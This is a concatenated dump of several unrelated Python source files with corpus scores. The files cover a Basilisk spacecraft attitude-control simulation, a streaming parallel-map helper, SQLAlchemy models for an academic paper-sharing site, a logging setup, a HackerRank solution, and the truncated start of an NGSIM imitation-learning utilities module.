0.433, -0.250] # 14 - 2 G ] for CSSHat in CSSOrientationList: newCSS = coarse_sun_sensor.CoarseSunSensor() newCSS.minOutput = 0. newCSS.senNoiseStd = 0.00 newCSS.nHat_B = CSSHat cssConstellation.appendCSS(newCSS) cssConstellation.outputConstellationMessage = "css_sensors_data" scSim.AddModelToTask(dynTaskName, cssConstellation) # Add the normals to the vehicle Config data struct cssConstVehicle = fswMessages.CSSConfigFswMsg() totalCSSList = [] for CSSHat in CSSOrientationList: newCSS = fswMessages.CSSUnitConfigFswMsg() newCSS.nHat_B = CSSHat newCSS.CBias = 1.0 totalCSSList.append(newCSS) cssConstVehicle.nCSS = len(CSSOrientationList) cssConstVehicle.cssVals = totalCSSList # setup Sun Position pyswice.furnsh_c(gravFactory.spiceObject.SPICEDataPath + 'de430.bsp') # solar system bodies pyswice.furnsh_c(gravFactory.spiceObject.SPICEDataPath + 'naif0011.tls') # leap second file pyswice.furnsh_c(gravFactory.spiceObject.SPICEDataPath + 'de-403-masses.tpc') # solar system masses pyswice.furnsh_c(gravFactory.spiceObject.SPICEDataPath + 'pck00010.tpc') # generic Planetary Constants Kernel sunPositionMsg = simMessages.SpicePlanetStateSimMsg() sunInitialState = 1000 * pyswice.spkRead('SUN', timeInitString, 'J2000', 'EARTH') rN_sun = sunInitialState[0:3] # meters vN_sun = sunInitialState[3:6] # m/s sunPositionMsg.PositionVector = rN_sun sunPositionMsg.VelocityVector = vN_sun # # setup the FSW algorithm tasks # # setup inertial3D guidance module inertial3DConfig = inertial3D.inertial3DConfig() inertial3DWrap = scSim.setModelDataWrap(inertial3DConfig) inertial3DWrap.ModelTag = "inertial3D" scSim.AddModelToTask(fswTaskName, inertial3DWrap, inertial3DConfig) inertial3DConfig.sigma_R0N = [0., 0., 0.] # set the desired inertial orientation inertial3DConfig.outputDataName = "guidanceInertial3D" # setup the attitude tracking error evaluation module attErrorConfig = attTrackingError.attTrackingErrorConfig() attErrorWrap = scSim.setModelDataWrap(attErrorConfig) attErrorWrap.ModelTag = "attErrorInertial3D" scSim.AddModelToTask(fswTaskName, attErrorWrap, attErrorConfig) attErrorConfig.outputDataName = "attErrorInertial3DMsg" attErrorConfig.inputRefName = inertial3DConfig.outputDataName attErrorConfig.inputNavName = sNavObject.outputAttName if detumble: # setup the MRP Feedback control module bdotControlConfig = B_DOT.B_DOTConfig() bdotControlWrap = scSim.setModelDataWrap(bdotControlConfig) bdotControlWrap.ModelTag = "B_DOT" scSim.AddModelToTask(fswTaskName, bdotControlWrap, bdotControlConfig) bdotControlConfig.inputMagMeterName = MagMeter.outputStateMessage bdotControlConfig.vehConfigInMsgName = "vehicleConfigName" bdotControlConfig.outputDataName = "LrRequested" bdotControlConfig.K_detumble = 1000.0 if saturate: bdotControlConfig.use_rw_wheels = 1 bdotControlConfig.rwParamsInMsgName = "rwa_config_data_parsed" bdotControlConfig.inputRWSpeedsName = rwStateEffector.OutputDataString # add module that maps the Lr control torque into the RW motor torques rwMotorTorqueConfig = rwMotorTorque.rwMotorTorqueConfig() rwMotorTorqueWrap = scSim.setModelDataWrap(rwMotorTorqueConfig) rwMotorTorqueWrap.ModelTag = "rwMotorTorque" scSim.AddModelToTask(dynTaskName, rwMotorTorqueWrap, rwMotorTorqueConfig) # Initialize the test module msg names if useRWVoltageIO: rwMotorTorqueConfig.outputDataName = "rw_torque_Lr" else: rwMotorTorqueConfig.outputDataName = rwStateEffector.InputCmds rwMotorTorqueConfig.inputVehControlName = bdotControlConfig.outputDataName rwMotorTorqueConfig.rwParamsInMsgName = bdotControlConfig.rwParamsInMsgName # Make the RW control all three body axes controlAxes_B = [ 1, 0, 0, 0, 1, 0, 0, 0, 1 ] rwMotorTorqueConfig.controlAxes_B = controlAxes_B if useRWVoltageIO: fswRWVoltageConfig = rwMotorVoltage.rwMotorVoltageConfig() fswRWVoltageWrap = scSim.setModelDataWrap(fswRWVoltageConfig) fswRWVoltageWrap.ModelTag = "rwMotorVoltage" # Add test module to runtime call list scSim.AddModelToTask(dynTaskName, fswRWVoltageWrap, fswRWVoltageConfig) # Initialize the test module configuration data fswRWVoltageConfig.torqueInMsgName = rwMotorTorqueConfig.outputDataName fswRWVoltageConfig.rwParamsInMsgName = bdotControlConfig.rwParamsInMsgName fswRWVoltageConfig.voltageOutMsgName = rwVoltageIO.rwVoltageInMsgName # set module parameters fswRWVoltageConfig.VMin = 0.0 # Volts fswRWVoltageConfig.VMax = 5.0 # Volts else: bdotControlConfig.use_rw_wheels = 0 torqueRodConfig = torqueRodDynamicEffector.torqueRodDynamicEffector() # torqueRodWrap = scSim.setModelDataWrap(torqueRodConfig) torqueRodConfig.ModelTag = "torqueRods" torqueRodConfig.magFieldMsgName = MagMeter.outputStateMessage torqueRodConfig.cmdTorqueRodsMsgName = bdotControlConfig.outputDataName torqueRodConfig.MaxDipoleMoment = 0.11 # [Am^2] scObject.addDynamicEffector(torqueRodConfig) scSim.AddModelToTask(dynTaskName, torqueRodConfig) if sunpoint: # Add Maxwell LS sunVectorConfig = maxwellLS.maxwellLSConfig() sunVectorWrap = scSim.setModelDataWrap(sunVectorConfig) sunVectorWrap.ModelTag = "maxwellLS" sunVectorConfig.cssDataInMsgName = "css_sensors_data" sunVectorConfig.cssConfigInMsgName = "css_config_data" sunVectorConfig.navStateOutMsgName = "css_nav_sunHeading" sunVectorConfig.sunpointOutMsgName = "sun_direction" sunVectorConfig.sensorUseThresh = 0.15 scSim.AddModelToTask(fswTaskName, sunVectorWrap, sunVectorConfig) # setup the QUAT PD control module quatControlConfig = QUAT_PD.QUAT_PDConfig() quatControlWrap = scSim.setModelDataWrap(quatControlConfig) quatControlWrap.ModelTag = "QUAT_PD" scSim.AddModelToTask(fswTaskName, quatControlWrap, quatControlConfig) quatControlConfig.inputSunName = "sun_direction" quatControlConfig.inputAttName = sNavObject.outputAttName quatControlConfig.inputGuidName = attErrorConfig.outputDataName quatControlConfig.inputRatesName = ImuSensor.OutputDataMsg quatControlConfig.vehConfigInMsgName = "vehicleConfigName" quatControlConfig.outputDataName = "LrRequested" quatControlConfig.rwParamsInMsgName = "rwa_config_data_parsed" quatControlConfig.inputRWSpeedsName = rwStateEffector.OutputDataString quatControlConfig.outputErrorName = "controlError" quatControlConfig.K = 0.015 quatControlConfig.P = 0.01 # add module that maps the Lr control torque into the RW motor torques rwMotorTorqueConfig = rwMotorTorque.rwMotorTorqueConfig() rwMotorTorqueWrap = scSim.setModelDataWrap(rwMotorTorqueConfig) rwMotorTorqueWrap.ModelTag = "rwMotorTorque" scSim.AddModelToTask(dynTaskName, rwMotorTorqueWrap, rwMotorTorqueConfig) # Initialize the test module msg names if useRWVoltageIO: rwMotorTorqueConfig.outputDataName = "rw_torque_Lr" else: rwMotorTorqueConfig.outputDataName = rwStateEffector.InputCmds rwMotorTorqueConfig.inputVehControlName = quatControlConfig.outputDataName rwMotorTorqueConfig.rwParamsInMsgName = quatControlConfig.rwParamsInMsgName # Make the RW control all three body axes controlAxes_B = [ 1, 0, 0, 0, 1, 0, 0, 0, 1 ] rwMotorTorqueConfig.controlAxes_B = controlAxes_B if useRWVoltageIO: fswRWVoltageConfig = rwMotorVoltage.rwMotorVoltageConfig() fswRWVoltageWrap = scSim.setModelDataWrap(fswRWVoltageConfig) fswRWVoltageWrap.ModelTag = "rwMotorVoltage" # Add test module to runtime call list scSim.AddModelToTask(dynTaskName, fswRWVoltageWrap, fswRWVoltageConfig) # Initialize the test module configuration data fswRWVoltageConfig.torqueInMsgName = rwMotorTorqueConfig.outputDataName fswRWVoltageConfig.rwParamsInMsgName = quatControlConfig.rwParamsInMsgName fswRWVoltageConfig.voltageOutMsgName = rwVoltageIO.rwVoltageInMsgName # set module parameters fswRWVoltageConfig.VMin = 0.0 # Volts fswRWVoltageConfig.VMax = 5.0 # Volts # # Setup data logging before the simulation is initialized # numDataPoints = 100000 samplingTime = simulationTime / (numDataPoints - 1) if detumble: # scSim.TotalSim.logThisMessage(bdotControlConfig.outputDataName, samplingTime) # scSim.TotalSim.logThisMessage(attErrorConfig.outputDataName, samplingTime) # scSim.TotalSim.logThisMessage(sNavObject.outputTransName, samplingTime) # scSim.TotalSim.logThisMessage(sNavObject.outputAttName, samplingTime) scSim.TotalSim.logThisMessage(ImuSensor.OutputDataMsg, samplingTime) scSim.TotalSim.logThisMessage(MagMeter.outputStateMessage, samplingTime) scSim.TotalSim.logThisMessage(bdotControlConfig.inputMagMeterName, samplingTime) # create the FSW vehicle configuration message vehicleConfigOut = fswMessages.VehicleConfigFswMsg() vehicleConfigOut.ISCPntB_B = I # use the same inertia in the FSW algorithm as in the simulation unitTestSupport.setMessage(scSim.TotalSim, fswProcessName, bdotControlConfig.vehConfigInMsgName, vehicleConfigOut) if saturate: scSim.TotalSim.logThisMessage(bdotControlConfig.inputRWSpeedsName, samplingTime) rwOutName = ["rw_config_0_data", "rw_config_1_data", "rw_config_2_data", "rw_config_3_data"] for item in rwOutName: scSim.TotalSim.logThisMessage(item, samplingTime) if useRWVoltageIO: scSim.TotalSim.logThisMessage(fswRWVoltageConfig.voltageOutMsgName, samplingTime) # FSW RW configuration message # use the same RW states in the FSW algorithm as in the simulation fswSetupRW.clearSetup() for key, rw in rwFactory.rwList.iteritems(): fswSetupRW.create(unitTestSupport.EigenVector3d2np(rw.gsHat_B), rw.Js, 0.2) fswSetupRW.writeConfigMessage(bdotControlConfig.rwParamsInMsgName, scSim.TotalSim, dynProcessName) if sunpoint: scSim.TotalSim.logThisMessage(cssConstellation.outputConstellationMessage, samplingTime) scSim.TotalSim.logThisMessage(sunVectorConfig.sunpointOutMsgName, samplingTime) scSim.TotalSim.logThisMessage(attErrorConfig.outputDataName, samplingTime) scSim.TotalSim.logThisMessage(sNavObject.outputAttName, samplingTime) scSim.TotalSim.logThisMessage(quatControlConfig.inputRWSpeedsName, samplingTime) scSim.TotalSim.logThisMessage(quatControlConfig.outputErrorName, samplingTime) scSim.TotalSim.logThisMessage(attErrorConfig.outputDataName, samplingTime) rwOutName = ["rw_config_0_data", "rw_config_1_data", "rw_config_2_data", "rw_config_3_data"] for item in rwOutName: scSim.TotalSim.logThisMessage(item, samplingTime) if useRWVoltageIO: scSim.TotalSim.logThisMessage(fswRWVoltageConfig.voltageOutMsgName, samplingTime) # create the FSW vehicle configuration message vehicleConfigOut = fswMessages.VehicleConfigFswMsg() vehicleConfigOut.ISCPntB_B = I # use the same inertia in the FSW algorithm as in the simulation unitTestSupport.setMessage(scSim.TotalSim, fswProcessName, quatControlConfig.vehConfigInMsgName, vehicleConfigOut) # FSW RW configuration message # use the same RW states in the FSW algorithm as in the simulation fswSetupRW.clearSetup() for key, rw in rwFactory.rwList.iteritems(): fswSetupRW.create(unitTestSupport.EigenVector3d2np(rw.gsHat_B), rw.Js, 0.2) fswSetupRW.writeConfigMessage(quatControlConfig.rwParamsInMsgName, scSim.TotalSim, dynProcessName) # # initialize Simulation # scSim.InitializeSimulationAndDiscover() # this next call ensures that the FSW and Dynamics Message that have the same # name are copied over every time the simulation ticks forward. This function # has to be called after the simulation is initialized to ensure that all modules # have created their own output/input messages declarations. # dyn2FSWInterface.discoverAllMessages() # fsw2DynInterface.discoverAllMessages() # # configure a simulation stop time time and execute the simulation run # scSim.ConfigureStopTime(simulationTime) scSim.ExecuteSimulation() # # retrieve the logged data # if detumble: # dataLr = scSim.pullMessageLogData(bdotControlConfig.outputDataName + ".torqueRequestBody", range(3)) # dataPos = scSim.pullMessageLogData(sNavObject.outputTransName + ".r_BN_N", range(3)) dataOmegaIMU = scSim.pullMessageLogData(ImuSensor.OutputDataMsg + ".AngVelPlatform", range(3)) dataMagBody = scSim.pullMessageLogData(bdotControlConfig.inputMagMeterName + ".mag_bf", range(3)) dataMagLVLH = scSim.pullMessageLogData(bdotControlConfig.inputMagMeterName + ".mag_hill", range(3)) if saturate: dataOmegaRW = scSim.pullMessageLogData(bdotControlConfig.inputRWSpeedsName + ".wheelSpeeds", range(numRW)) np.set_printoptions(precision=16) if sunpoint: dataCSSArray = scSim.pullMessageLogData(cssConstellation.outputConstellationMessage + ".CosValue", range(len(CSSOrientationList))) dataSunVector = scSim.pullMessageLogData(sunVectorConfig.sunpointOutMsgName + ".q_des_RN", range(4)) dataOmegaRW = scSim.pullMessageLogData(quatControlConfig.inputRWSpeedsName + ".wheelSpeeds", range(numRW)) dataSigmaBN = scSim.pullMessageLogData(sNavObject.outputAttName + ".sigma_BN", range(3)) dataOmegaBN = scSim.pullMessageLogData(sNavObject.outputAttName + ".omega_BN_B", range(3)) dataSigmaBR = scSim.pullMessageLogData(attErrorConfig.outputDataName + ".sigma_BR", range(3)) # # plot the results # fileName = os.path.basename(os.path.splitext(__file__)[0]) plt.close("all") # clears out plots from earlier test runs if detumble: plt.figure(1) for idx in range(1, 4): plt.plot(dataOmegaIMU[:, 0] * macros.NANO2MIN, dataOmegaIMU[:, idx] * macros.R2D, color=unitTestSupport.getLineColor(idx, 3), label='$\omega_' + str(idx) + '$') plt.title('Detumbling Simulation Angular Rates', fontsize=16, fontweight='bold') plt.legend(loc='upper right', fontsize=16) plt.xlabel('Time (min)', fontsize=16) plt.ylabel('Angular Rates (deg/s)', fontsize=16) # # Mag Meter Body # plt.figure(6) # plt.plot(dataMagBody[:, 0] * macros.NANO2HOUR, dataMagBody[:, 1], # color='blue', # label='x') # plt.plot(dataMagBody[:, 0] * macros.NANO2HOUR, dataMagBody[:, 2], # color='red', # label='y') # plt.plot(dataMagBody[:, 0] * macros.NANO2HOUR, dataMagBody[:, 3], # color='black', # label='z') # plt.grid(True) # plt.legend(loc='upper right', fontsize=16) # plt.title('Magnetic Field - Body Frame', fontsize=16) # plt.xlabel('Time (h)', fontsize=16) # plt.ylabel('Magnetic Field Magnitude (T)', fontsize=16) # # Mag Meter LVLH # plt.figure(7) # plt.plot(dataMagLVLH[:, 0] * macros.NANO2HOUR, dataMagLVLH[:, 1], # color='blue', # label='$i_r$') # plt.plot(dataMagLVLH[:, 0] * macros.NANO2HOUR, dataMagLVLH[:, 2], # color='red', # label='$i_{\\theta}$') # plt.plot(dataMagLVLH[:, 0] * macros.NANO2HOUR, dataMagLVLH[:, 3], # color='black', # label='$i_h$') # plt.grid(True) # plt.legend(loc='upper right', fontsize=16) # plt.title('Basilisk (Simple Tilted Dipole) - 90 degree inclination', fontsize=16) # plt.xlabel('Time (h)', fontsize=16) # plt.ylabel('Magnetic Field Magnitude (T)', fontsize=16) if saturate: plt.figure(2) for idx in range(1, numRW + 1): plt.plot(dataOmegaRW[:, 0] * macros.NANO2MIN, dataOmegaRW[:, idx] / macros.RPM, color=unitTestSupport.getLineColor(idx, numRW), label='$\Omega_{' + str(idx) + '}$') plt.title('Reaction Wheel Spin Rates', fontsize=16, fontweight='bold') plt.legend(loc='upper right', fontsize=16) plt.xlabel('Time (min)', fontsize=16) plt.ylabel('RW Speed [RPM]', fontsize=16) if sunpoint: # CSS Sensor Readings plt.figure(1) for idx in range(1, 15): # range(1,len(CSSList)+1) currently hardcoded. Remove when initialization block plt.plot(dataCSSArray[:, 0] * macros.NANO2SEC, dataCSSArray[:, idx], # color=unitTestSupport.getLineColor(idx,2), label='CSS$_{' + str(idx) + '}$') plt.title('CSS raw sensor readings', fontsize=12, fontweight='bold') plt.xlabel('Time [sec]', fontsize=10, fontweight='bold') plt.legend(fontsize=10) plt.ylabel("CSS Voltage", fontsize=10, fontweight='bold') # plt.figure(2) # for idx in range(1, 5): # plt.plot(dataSunVector[:, 0] * macros.NANO2SEC, dataSunVector[:, idx], # color=unitTestSupport.getLineColor(idx, 4), # label='$\\beta_{' + str(idx) + '}$') # plt.legend(loc='lower right') # plt.title('Sun Vector Estimation Quaternion') # plt.xlabel('Time [sec]') # plt.ylabel('Quaternion $\\beta_{B/R}$') plt.figure(7) for idx in range(1, 4): plt.plot(dataSigmaBR[:, 0] * macros.NANO2SEC, dataSigmaBR[:, idx], color=unitTestSupport.getLineColor(idx, 3), label='$\sigma_' + str(idx) + '$') plt.title('Control Error', fontsize=16, fontweight='bold') plt.legend(loc='upper right', fontsize=16) plt.xlabel('Time (s)', fontsize=16) plt.ylabel('$\sigma_{B/R}$', fontsize=16) plt.figure(4) for idx in range(1, numRW + 1): plt.plot(dataOmegaRW[:, 0] * macros.NANO2SEC, dataOmegaRW[:, idx] / macros.RPM, color=unitTestSupport.getLineColor(idx, numRW), label='$\Omega_{' + str(idx) + '}$') plt.legend(loc='lower right') plt.xlabel('Time [sec]') plt.ylabel('RW Speed (RPM) ') # plt.figure(5) # for idx in range(1,4): # plt.plot(dataSigmaBN[:, 0] * macros.NANO2SEC, dataSigmaBN[:, idx], # color=unitTestSupport.getLineColor(idx, 3), # label='$\sigma_' + str(idx) + '$') # plt.legend(loc='lower right') # plt.xlabel('Time [min]') # plt.ylabel('Inertial Attitude $\sigma_{B/N}$') plt.figure(6) for idx in range(1,4): plt.plot(dataOmegaBN[:, 0] * macros.NANO2SEC, dataOmegaBN[:, idx] * macros.R2D, color=unitTestSupport.getLineColor(idx, 3), label='$\omega_' + str(idx) + '$') plt.legend(loc='lower right') plt.xlabel('Time [sec]') plt.ylabel('Angular Rates') if show_plots: plt.show() # close the plots being saved off to avoid over-writing old and new figures plt.close("all") return numDataPoints # # This statement below ensures that the unit test scrip can be run as a # stand-along python script # if __name__ == "__main__": run( True, # show_plots False, # detumble False, # saturate True, # sunpoint False, # useUnmodeledTorque False, # useJitterSimple False, # useRWVoltageIO )
1.375
1
generators/map_parallel.py
CodyKochmann/generators
6
11084
from multiprocessing import Pool from multiprocessing.pool import ThreadPool from queue import Queue from .chunks import chunks __all__ = 'map_parallel', 'map_multicore', 'map_multithread' def _pool_map_stream(pool_type, pipe, fn, workers): assert callable(fn), fn assert isinstance(workers, int), workers assert workers > 0, workers p = pool_type(workers) job_q = Queue(maxsize=int(workers*2)) try: for chunk in chunks(pipe, workers*2): for i in chunk: job_q.put(p.apply_async(fn, [i])) for i in pipe: yield job_q.get().get() job_q.put(p.apply_async(fn, [i])) while not job_q.empty(): yield job_q.get().get() finally: p.terminate() def map_multicore(pipe, fn, workers): ''' This streams map operations through a Pool without needing to load the entire stream into a massive list first, like Pool.map normally requires. ''' assert callable(fn), fn assert isinstance(workers, int), workers assert workers > 0, workers pipe = iter(pipe) return _pool_map_stream(Pool, **locals()) def map_multithread(pipe, fn, workers): ''' This streams map operations through a ThreadPool without needing to load the entire stream into a massive list first, like ThreadPool.map normally requires. ''' assert callable(fn), fn assert isinstance(workers, int), workers assert workers > 0, workers pipe = iter(pipe) return _pool_map_stream(ThreadPool, **locals()) def map_parallel(pipe, fn, workers): ''' This streams map operations in parallel through a pool of processes or threads. If the os does not allow multiprocessing or the datatypes are not serializable, operation reverts to ThreadPools ''' assert callable(fn), fn assert isinstance(workers, int), workers assert workers > 0, workers pipe = iter(pipe) try: for i in map_multicore(pipe, fn, workers): yield i except: for i in map_multithread(pipe, fn, workers): yield i if __name__ == '__main__': import random, time def work(i): print('working on: {}'.format(i)) time.sleep(random.random()) print('finished: {}'.format(i)) return i*2 l = G( range(10) ).map( float ).map_parallel( work, 5 ).print().run()
3.359375
3
apps/bot/classes/messages/attachments/AudioAttachment.py
Xoma163/Petrovich
0
11085
<reponame>Xoma163/Petrovich<filename>apps/bot/classes/messages/attachments/AudioAttachment.py<gh_stars>0 from apps.bot.classes.messages.attachments.Attachment import Attachment class AudioAttachment(Attachment): TYPE = "audio" def __init__(self): super().__init__(self.TYPE) self.duration = None def parse_vk_audio(self, event_audio): from petrovich.settings import VK_URL self.url = f"{VK_URL}video{event_audio['owner_id']}_{event_audio['id']}" self.private_download_url = event_audio['url'] self.duration = event_audio['duration']
2.203125
2
app/models.py
TrigeekSpace/academia-bknd
0
11086
""" SQLAlchemy database models. """ from datetime import datetime from depot.fields.sqlalchemy import UploadedFileField from app import db from app.util.data import many_to_many, foreign_key from app.config import TOKEN_LEN class User(db.Model): """ User model class. """ id = db.Column(db.Integer(), primary_key=True, autoincrement=True) username = db.Column(db.String(32), unique=True) email = db.Column(db.String(64), unique=True) password = db.Column(db.Binary(32)) join_date = db.Column(db.DateTime(), default=datetime.now) active = db.Column(db.Boolean(), default=False) avatar = db.Column(UploadedFileField()) self_introduction = db.Column(db.Text(), unique=True) contribution = db.Column(db.Integer(), default=0) job = db.Column(db.String(64), unique=True) class Session(db.Model): """ API session class. """ token = db.Column(db.Binary(TOKEN_LEN), primary_key=True) user, user_id = foreign_key("User", backref_name="sessions") class AbstractBaseGroup(object): """ Abstract base group class. """ pass class Group(db.Model, AbstractBaseGroup): """ Group model class. """ id = db.Column(db.Integer(), primary_key=True, autoincrement=True) name = db.Column(db.String(32), unique=True) users = many_to_many("Group", "User", backref_name="groups") introduction = db.Column(db.Text()) class Paper(db.Model): """ Paper model class. """ id = db.Column(db.Integer(), primary_key=True, autoincrement=True) title = db.Column(db.String(256), unique=False) abstract = db.Column(db.Text(), unique=False) authors = db.Column(db.String(256), unique=False) conference = db.Column(db.String(128), unique=False) publish_date = db.Column(db.DateTime(), default=datetime.now) # Accurate to the day owners = many_to_many("Paper", "User", backref_name="papers") owngroup = many_to_many("Paper", "Group", backref_name="papers") collectors = many_to_many("Paper", "User", backref_name="collect_papers") paper_file = db.Column(UploadedFileField()) class Note(db.Model): """ User model class. """ id = db.Column(db.Integer(), primary_key=True, autoincrement=True) title = db.Column(db.String(256), unique=False) create_time = db.Column(db.DateTime(), default=datetime.now) last_modified = db.Column(db.DateTime(), default=datetime.now) author, author_id = foreign_key("User", backref_name="notes") paper, paper_id = foreign_key("Paper", backref_name="notes") collectors = many_to_many("Note", "User", backref_name="collect_notes") owngroup = many_to_many("Note", "Group", backref_name="notes") content = db.Column(db.Text(), unique=False) annotation_file = db.Column(UploadedFileField()) class Question(db.Model): id = db.Column(db.Integer(), primary_key=True, autoincrement=True) provider, provider_id = foreign_key("User", backref_name="questions_asked") titie = db.Column(db.String(256), unique=False) description = db.Column(db.Text(), unique=False) upvotes = many_to_many("Question", "User", backref_name="questions_upvote") downvotes = many_to_many("Question", "User", backref_name="questions_downvote") create_time = db.Column(db.DateTime(), default=datetime.now) last_modified = db.Column(db.DateTime(), default=datetime.now) class Reply(db.Model): id = db.Column(db.Integer(), primary_key=True, autoincrement=True) provider, provider_id = foreign_key("User", backref_name="replies") host_question, q_id = foreign_key("Question", backref_name="replies") content = db.Column(db.Text()) upvotes = many_to_many("Reply", "User", backref_name="replies_upvote") downvotes = many_to_many("Reply", "User", backref_name="replies_downvote") create_time = db.Column(db.DateTime(), default=datetime.now) last_modified = db.Column(db.DateTime(), default=datetime.now) class Comment(db.Model): id = db.Column(db.Integer(), primary_key=True, autoincrement=True) provider, provider_id = foreign_key("User", backref_name="comments") host_question, q_id = foreign_key("Question", backref_name="comments") host_reply, r_id = foreign_key("Reply", backref_name="comments") content = db.Column(db.Text(), unique=False) create_time = db.Column(db.DateTime(), default=datetime.now) last_modified = db.Column(db.DateTime(), default=datetime.now)
2.6875
3
log.py
GregMorford/testlogging
0
11087
<filename>log.py<gh_stars>0 import logging ## Logging Configuration ## logger = logging.getLogger(__name__) logger.setLevel(logging.INFO) ch = logging.StreamHandler() # console handler ch.setLevel(logging.INFO) fh = logging.FileHandler('logfile.txt') fh.setLevel(logging.INFO) fmtr = logging.Formatter('%(asctime)s | [%(levelname)s] | (%(name)s) | %(message)s') fh.setFormatter(fmtr) logger.addHandler(fh) logger.addHandler(ch) #disable this to stop console output. This better than print statements as you can disable all console output in 1 spot instead of every print statement. logger.critical(f'testing a critical message from {__name__}')
3.1875
3
hackerrank/BetweenTwoSets.py
0x8b/HackerRank
3
11088
#!/bin/python3 import os def getTotalX(a, b): c = 0 for i in range(max(a), min(b) + 1): if all([i % d == 0 for d in a]) and all([d % i == 0 for d in b]): c += 1 return c if __name__ == "__main__": f = open(os.environ["OUTPUT_PATH"], "w") nm = input().split() n = int(nm[0]) m = int(nm[1]) a = list(map(int, input().rstrip().split())) b = list(map(int, input().rstrip().split())) total = getTotalX(a, b) f.write(str(total) + "\n") f.close()
3.203125
3
utils.py
LlamaSi/Adaptive-PSGAIL
10
11089
import h5py import numpy as np import os, pdb import tensorflow as tf from rllab.envs.base import EnvSpec from rllab.envs.normalized_env import normalize as normalize_env import rllab.misc.logger as logger from sandbox.rocky.tf.algos.trpo import TRPO from sandbox.rocky.tf.policies.gaussian_mlp_policy import GaussianMLPPolicy from sandbox.rocky.tf.policies.gaussian_gru_policy import GaussianGRUPolicy from sandbox.rocky.tf.envs.base import TfEnv from sandbox.rocky.tf.spaces.discrete import Discrete from hgail.algos.hgail_impl import Level from hgail.baselines.gaussian_mlp_baseline import GaussianMLPBaseline from hgail.critic.critic import WassersteinCritic from hgail.envs.spec_wrapper_env import SpecWrapperEnv from hgail.envs.vectorized_normalized_env import vectorized_normalized_env from hgail.misc.datasets import CriticDataset, RecognitionDataset from hgail.policies.categorical_latent_sampler import CategoricalLatentSampler from hgail.policies.gaussian_latent_var_gru_policy import GaussianLatentVarGRUPolicy from hgail.policies.gaussian_latent_var_mlp_policy import GaussianLatentVarMLPPolicy from hgail.policies.latent_sampler import UniformlyRandomLatentSampler from hgail.core.models import ObservationActionMLP from hgail.policies.scheduling import ConstantIntervalScheduler from hgail.recognition.recognition_model import RecognitionModel from hgail.samplers.hierarchy_sampler import HierarchySampler import hgail.misc.utils from julia_env.julia_env import JuliaEnv ''' Const NGSIM_FILENAME_TO_ID = { 'trajdata_i101_trajectories-0750am-0805am.txt': 1, 'trajdata_i101_trajectories-0805am-0820am.txt': 2, 'trajdata_i101_trajectories-0820am-0835am.txt': 3, 'trajdata_i80_trajectories-0400-0415.txt': 4, 'trajdata_i80_trajectories-0500-0515.txt': 5, 'trajdata_i80_trajectories-0515-0530.txt': 6 }''' NGSIM_FILENAME_TO_ID = { 'trajdata_i101_trajectories-0750am-0805am.txt': 1, 'trajdata_i101-22agents-0750am-0805am.txt' : 1 } ''' Common ''' def maybe_mkdir(dirpath): if not os.path.exists(dirpath): os.mkdir(dirpath) def partition_list(lst, n): sublists = [[] for _ in range(n)] for i, v in enumerate(lst): sublists[i % n].append(v) return sublists def str2bool(v): if v.lower() == 'true': return True return False def write_trajectories(filepath, trajs): np.savez(filepath, trajs=trajs) def load_trajectories(filepath): return np.load(filepath)['trajs'] def filename2label(fn): s = fn.find('-') + 1 e = fn.rfind('_') return fn[s:e] def load_trajs_labels(directory, files_to_use=[0,1,2,3,4,5]): filenames = [ 'trajdata_i101_trajectories-0750am-0805am_trajectories.npz', 'trajdata_i101_trajectories-0805am-0820am_trajectories.npz', 'trajdata_i101_trajectories-0820am-0835am_trajectories.npz', 'trajdata_i80_trajectories-0400-0415_trajectories.npz', 'trajdata_i80_trajectories-0500-0515_trajectories.npz', 'trajdata_i80_trajectories-0515-0530_trajectories.npz' ] filenames = [filenames[i] for i in files_to_use] labels = [filename2label(fn) for fn in filenames] filepaths = [os.path.join(directory, fn) for fn in filenames] trajs = [load_trajectories(fp) for fp in filepaths] return trajs, labels ''' Component build functions ''' ''' This is about as hacky as it gets, but I want to avoid editing the rllab source code as much as possible, so it will have to do for now. Add a reset(self, kwargs**) function to the normalizing environment https://stackoverflow.com/questions/972/adding-a-method-to-an-existing-object-instance ''' def normalize_env_reset_with_kwargs(self, **kwargs): ret = self._wrapped_env.reset(**kwargs) if self._normalize_obs: return self._apply_normalize_obs(ret) else: return ret def add_kwargs_to_reset(env): normalize_env = hgail.misc.utils.extract_normalizing_env(env) if normalize_env is not None: normalize_env.reset = normalize_env_reset_with_kwargs.__get__(normalize_env) '''end of hack, back to our regularly scheduled programming''' # Raunak adding an input argument for multiagent video making def build_ngsim_env( args, exp_dir='/tmp', alpha=0.001, vectorize=True, render_params=None, videoMaking=False): basedir = os.path.expanduser('~/.julia/v0.6/NGSIM/data') filepaths = [os.path.join(basedir, args.ngsim_filename)] if render_params is None: render_params = dict( viz_dir=os.path.join(exp_dir, 'imitate/viz'), zoom=5. ) env_params = dict( trajectory_filepaths=filepaths, H=args.env_H, primesteps=args.env_primesteps, action_repeat=args.env_action_repeat, terminate_on_collision=False, terminate_on_off_road=False, render_params=render_params, n_envs=args.n_envs, n_veh=args.n_envs, remove_ngsim_veh=args.remove_ngsim_veh, reward=args.env_reward ) # order matters here because multiagent is a subset of vectorized # i.e., if you want to run with multiagent = true, then vectorize must # also be true if args.env_multiagent: env_id = 'MultiagentNGSIMEnv' if videoMaking: print('RAUNAK BHATTACHARRYA VIDEO MAKER IS ON') env_id='MultiagentNGSIMEnvVideoMaker' alpha = alpha * args.n_envs normalize_wrapper = vectorized_normalized_env elif vectorize: env_id = 'VectorizedNGSIMEnv' alpha = alpha * args.n_envs normalize_wrapper = vectorized_normalized_env else: env_id = 'NGSIMEnv' normalize_wrapper = normalize_env print(env_params) env = JuliaEnv( env_id=env_id, env_params=env_params, using='AutoEnvs' ) # get low and high values for normalizing _real_ actions low, high = env.action_space.low, env.action_space.high env = TfEnv(normalize_wrapper(env, normalize_obs=True, obs_alpha=alpha)) add_kwargs_to_reset(env) return env, low, high def build_critic(args, data, env, writer=None): if args.use_critic_replay_memory: critic_replay_memory = hgail.misc.utils.KeyValueReplayMemory(maxsize=3 * args.batch_size) else: critic_replay_memory = None critic_dataset = CriticDataset( data, replay_memory=critic_replay_memory, batch_size=args.critic_batch_size, flat_recurrent=args.policy_recurrent ) critic_network = ObservationActionMLP( name='critic', hidden_layer_dims=args.critic_hidden_layer_dims, dropout_keep_prob=args.critic_dropout_keep_prob ) critic = WassersteinCritic( obs_dim=env.observation_space.flat_dim, act_dim=env.action_space.flat_dim, dataset=critic_dataset, network=critic_network, gradient_penalty=args.gradient_penalty, 